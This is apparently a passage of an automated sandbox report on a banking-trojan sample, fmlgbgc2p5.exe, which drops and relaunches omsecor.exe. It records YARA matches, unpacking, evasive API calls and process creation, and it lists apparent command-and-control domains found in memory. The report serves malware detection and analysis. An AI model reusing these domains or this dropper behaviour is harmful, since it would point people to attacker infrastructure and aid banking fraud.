            Source: fmlgbgc2p5.exe, 00000000.00000002.1641221794.000000000048D000.00000004.00000020.00020000.00000000.sdmp, fmlgbgc2p5.exe, 00000000.00000002.1641457885.00000000020BB000.00000004.00000020.00020000.00000000.sdmp, fmlgbgc2p5.exe, 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, omsecor.exe, 00000004.00000002.1663858089.00000000020F9000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000004.00000002.1663673334.000000000054D000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.1905585206.00000000020A6000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.1905345423.000000000074D000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, omsecor.exe, 00000010.00000002.1905863705.0000000002026000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000010.00000002.1905714448.0000000000701000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, omsecor.exe, 00000017.00000002.2376204202.0000000000531000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000017.00000002.2376628433.000000000206F000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, omsecor.exe, 0000001A.00000002.2374629905.00000000020B4000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000001A.00000002.2374377981.0000000000651000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon
            Source: omsecor.exe, 00000012.00000002.2334469520.00000000006A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/~
            Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: Process Memory Space: fmlgbgc2p5.exe PID: 7280, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: fmlgbgc2p5.exe PID: 7336, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 7360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 7452, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 8072, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 8100, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 8132, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 396, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 7440, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 7596, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 7612, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 7296, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to behavior
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 0_2_004030000_2_00403000
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 0_2_0042117B0_2_0042117B
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 0_2_004055820_2_00405582
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_00401C412_2_00401C41
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_0040D2A42_2_0040D2A4
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_0040B51C2_2_0040B51C
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_0040CBD02_2_0040CBD0
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 4_2_004030004_2_00403000
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 4_2_0042117B4_2_0042117B
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 4_2_004055824_2_00405582
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 7_2_00401C417_2_00401C41
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 7_2_0040D2A47_2_0040D2A4
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 7_2_0040B51C7_2_0040B51C
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 7_2_0040CBD07_2_0040CBD0
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_0040300013_2_00403000
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_0042117B13_2_0042117B
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_0040558213_2_00405582
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 14_2_00401C4114_2_00401C41
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 14_2_0040D2A414_2_0040D2A4
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 14_2_0040B51C14_2_0040B51C
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 14_2_0040CBD014_2_0040CBD0
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 16_2_0040300016_2_00403000
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 16_2_0042117B16_2_0042117B
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 16_2_0040558216_2_00405582
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 18_2_00401C4118_2_00401C41
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 18_2_0040D2A418_2_0040D2A4
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 18_2_0040B51C18_2_0040B51C
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 18_2_0040CBD018_2_0040CBD0
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 23_2_0040300023_2_00403000
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 23_2_0042117B23_2_0042117B
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 23_2_0040558223_2_00405582
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 24_2_00401C4124_2_00401C41
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 24_2_0040D2A424_2_0040D2A4
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 24_2_0040B51C24_2_0040B51C
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 24_2_0040CBD024_2_0040CBD0
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 26_2_0040300026_2_00403000
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 26_2_0042117B26_2_0042117B
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 26_2_0040558226_2_00405582
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 28_2_00401C4128_2_00401C41
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 28_2_0040D2A428_2_0040D2A4
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 28_2_0040B51C28_2_0040B51C
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 28_2_0040CBD028_2_0040CBD0
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: String function: 00403416 appears 45 times
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: String function: 004054ED appears 54 times
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: String function: 00405493 appears 96 times
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: String function: 00402F98 appears 60 times
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: String function: 0040D5B0 appears 84 times
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: String function: 00405511 appears 168 times
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: String function: 004054ED appears 36 times
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: String function: 00405493 appears 64 times
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: String function: 00402F98 appears 40 times
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: String function: 0040D5B0 appears 56 times
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: String function: 00405511 appears 112 times
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: String function: 00405493 appears 32 times
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: String function: 00405511 appears 56 times
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 304
            Source: fmlgbgc2p5.exe, 00000000.00000002.1641221794.000000000048D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBuild private6 vs fmlgbgc2p5.exe
            Source: fmlgbgc2p5.exe, 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBuild private6 vs fmlgbgc2p5.exe
            Source: fmlgbgc2p5.exe, 00000002.00000000.1334585253.0000000000422000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBuild private6 vs fmlgbgc2p5.exe
            Source: fmlgbgc2p5.exe, 00000002.00000002.1335946619.0000000000568000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBuild private6 vs fmlgbgc2p5.exe
            Source: fmlgbgc2p5.exeBinary or memory string: OriginalFilenameBuild private6 vs fmlgbgc2p5.exe
            Source: fmlgbgc2p5.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: fmlgbgc2p5.exeStatic PE information: Section: .MPRESS1 ZLIB complexity 1.000390625
            Source: omsecor.exe.2.drStatic PE information: Section: .MPRESS1 ZLIB complexity 1.000390625
            Source: omsecor.exe.7.drStatic PE information: Section: .MPRESS1 ZLIB complexity 1.000390625
            Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@29/27@3/3
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_0040A057 GetForegroundWindow,CoCreateInstance,SetForegroundWindow,2_2_0040A057
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeFile created: C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8132
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7360
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7440
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7280
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8072
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7612
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\4030a128-f984-41bb-8247-52fc47dfeff4Jump to behavior
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: fmlgbgc2p5.exeReversingLabs: Detection: 89%
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeFile read: C:\Users\user\Desktop\fmlgbgc2p5.exeJump to behavior
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_2-5780
            Source: C:\Users\user\AppData\Roaming\omsecor.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_7-5780
            Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_14-5780
            Source: unknownProcess created: C:\Users\user\Desktop\fmlgbgc2p5.exe "C:\Users\user\Desktop\fmlgbgc2p5.exe"
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeProcess created: C:\Users\user\Desktop\fmlgbgc2p5.exe C:\Users\user\Desktop\fmlgbgc2p5.exe
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 304
            Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 276
            Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
            Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe
            Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8072 -s 280
            Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8132 -s 276
            Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
            Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe
            Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 248
            Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
            Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7612 -s 260
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeProcess created: C:\Users\user\Desktop\fmlgbgc2p5.exe C:\Users\user\Desktop\fmlgbgc2p5.exeJump to behavior
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exeJump to behavior
            Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exeJump to behavior
            Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exeJump to behavior
            Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exeJump to behavior
            Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Roaming\omsecor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeUnpacked PE file: 0.2.fmlgbgc2p5.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeUnpacked PE file: 2.2.fmlgbgc2p5.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .text:ER;.rdata:R;.data:W;
            Source: C:\Users\user\AppData\Roaming\omsecor.exeUnpacked PE file: 4.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Roaming\omsecor.exeUnpacked PE file: 7.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .text:ER;.rdata:R;.data:W;
            Source: C:\Windows\SysWOW64\omsecor.exeUnpacked PE file: 13.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Windows\SysWOW64\omsecor.exeUnpacked PE file: 14.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .text:ER;.rdata:R;.data:W;
            Source: C:\Users\user\AppData\Roaming\omsecor.exeUnpacked PE file: 16.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Roaming\omsecor.exeUnpacked PE file: 18.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .text:ER;.rdata:R;.data:W;
            Source: C:\Windows\SysWOW64\omsecor.exeUnpacked PE file: 23.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Windows\SysWOW64\omsecor.exeUnpacked PE file: 24.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .text:ER;.rdata:R;.data:W;
            Source: C:\Users\user\AppData\Roaming\omsecor.exeUnpacked PE file: 26.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Roaming\omsecor.exeUnpacked PE file: 28.2.omsecor.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .text:ER;.rdata:R;.data:W;
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeUnpacked PE file: 2.2.fmlgbgc2p5.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\omsecor.exeUnpacked PE file: 7.2.omsecor.exe.400000.0.unpack
            Source: C:\Windows\SysWOW64\omsecor.exeUnpacked PE file: 14.2.omsecor.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\omsecor.exeUnpacked PE file: 18.2.omsecor.exe.400000.0.unpack
            Source: C:\Windows\SysWOW64\omsecor.exeUnpacked PE file: 24.2.omsecor.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\omsecor.exeUnpacked PE file: 28.2.omsecor.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 0_2_00404854 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__invoke_watson,GetProcAddress,GetProcAddress,__invoke_watson,0_2_00404854
            Source: initial sampleStatic PE information: section where entry point is pointing to: .MPRESS2
            Source: omsecor.exe.7.drStatic PE information: real checksum: 0x20bce should be: 0x21399
            Source: omsecor.exe.2.drStatic PE information: real checksum: 0x20bce should be: 0x211cb
            Source: fmlgbgc2p5.exeStatic PE information: real checksum: 0x20bce should be: 0x21860
            Source: fmlgbgc2p5.exeStatic PE information: section name: .MPRESS1
            Source: fmlgbgc2p5.exeStatic PE information: section name: .MPRESS2
            Source: omsecor.exe.2.drStatic PE information: section name: .MPRESS1
            Source: omsecor.exe.2.drStatic PE information: section name: .MPRESS2
            Source: omsecor.exe.7.drStatic PE information: section name: .MPRESS1
            Source: omsecor.exe.7.drStatic PE information: section name: .MPRESS2
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 0_2_00402FDD push ecx; ret 0_2_00402FF0
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_0040D293 push ecx; ret 2_2_0040D2A3
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_0040CBB5 push ecx; ret 2_2_0040CBC8
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 4_2_00402FDD push ecx; ret 4_2_00402FF0
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 7_2_0040D293 push ecx; ret 7_2_0040D2A3
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 7_2_0040CBB5 push ecx; ret 7_2_0040CBC8
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_00402FDD push ecx; ret 13_2_00402FF0
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 14_2_0040D293 push ecx; ret 14_2_0040D2A3
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 14_2_0040CBB5 push ecx; ret 14_2_0040CBC8
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 16_2_00402FDD push ecx; ret 16_2_00402FF0
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 18_2_0040D293 push ecx; ret 18_2_0040D2A3
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 18_2_0040CBB5 push ecx; ret 18_2_0040CBC8
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 23_2_00402FDD push ecx; ret 23_2_00402FF0
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 24_2_0040D293 push ecx; ret 24_2_0040D2A3
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 24_2_0040CBB5 push ecx; ret 24_2_0040CBC8
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 26_2_00402FDD push ecx; ret 26_2_00402FF0
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 28_2_0040D293 push ecx; ret 28_2_0040D2A3
